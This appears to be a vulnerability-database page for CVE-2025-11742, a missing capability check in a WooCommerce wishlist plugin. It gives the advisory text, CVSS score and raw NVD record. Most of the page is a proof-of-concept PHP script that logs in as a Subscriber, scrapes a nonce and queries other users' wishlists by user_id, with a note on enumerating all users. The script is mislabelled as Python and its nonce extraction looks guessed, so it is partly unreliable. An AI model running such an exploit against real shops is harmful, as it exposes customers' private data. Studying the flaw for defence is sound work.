CVE-2025-11742

Description

The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wishlist_quickview' AJAX action in all versions up to, and including, 5.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's wishlist data and information.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WPC Smart Wishlist for WooCommerce <= 5.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/**
 * CVE-2025-11742 Proof of Concept
 * WPC Smart Wishlist for WooCommerce - Unauthorized Access via 'wishlist_quickview' AJAX action
 *
 * Description: This PoC demonstrates how an authenticated Subscriber-level user
 * can exploit the missing capability check on the 'wishlist_quickview' AJAX action
 * to retrieve other users' wishlist data.
 */

// Target site URL
$target_url = 'https://target-wordpress-site.com';

// Attacker credentials (Subscriber-level access)
$attacker_username = 'attacker_user';
$attacker_password = 'attacker_password';

// Step 1: Authenticate and obtain cookies via wp-login.php
$login_url = $target_url . '/wp-login.php';
$cookie_jar = tempnam(sys_get_temp_dir(), 'cookies');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log'        => $attacker_username,
    'pwd'        => $attacker_password,
    'wp-submit'  => 'Log In',
    'redirect_to'=> $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract the WordPress nonce from a page (required for AJAX requests)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/shop/');
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$page_content = curl_exec($ch);
curl_close($ch);

preg_match('/wp_ajax_nonce["\s:=]+([a-f0-9]+)/', $page_content, $nonce_match);
$nonce = $nonce_match[1] ?? '';

// Step 3: Exploit the 'wishlist_quickview' AJAX action without proper capability check
// Target victim user ID (can be iterated to enumerate all users)
$victim_user_id = 1;

$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action'      => 'wishlist_quickview',
    'user_id'     => $victim_user_id,
    '_ajax_nonce' => $nonce
]));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Exploit Response:\n" . $response . "\n";

// Cleanup
unlink($cookie_jar);
?>

// Alternative: Python-based PoC using requests library
# import requests
# target = 'https://target-wordpress-site.com'
# session = requests.Session()
# session.post(f'{target}/wp-login.php', data={'log': 'attacker', 'pwd': 'password', 'wp-submit': 'Log In'})
# resp = session.post(f'{target}/wp-admin/admin-ajax.php', data={'action': 'wishlist_quickview', 'user_id': '1'})
# print(resp.text)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11742
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11742
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11742/
[4] VulDB https://vuldb.com/cve/CVE-2025-11742
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378540%40woo-smart-wishlist&new=3378540%40woo-smart-wishlist&sfp_email=&sfph_mail=
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/60d65c7e-5533-4ac0-b2f0-339342224581?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11742", "sourceIdentifier": "[email protected]", "published": "2025-10-18T06:15:38.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wishlist_quickview' AJAX action in all versions up to, and including, 5.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's wishlist data and information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378540%40woo-smart-wishlist&new=3378540%40woo-smart-wishlist&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60d65c7e-5533-4ac0-b2f0-339342224581?source=cve", "source": "[email protected]"}]}}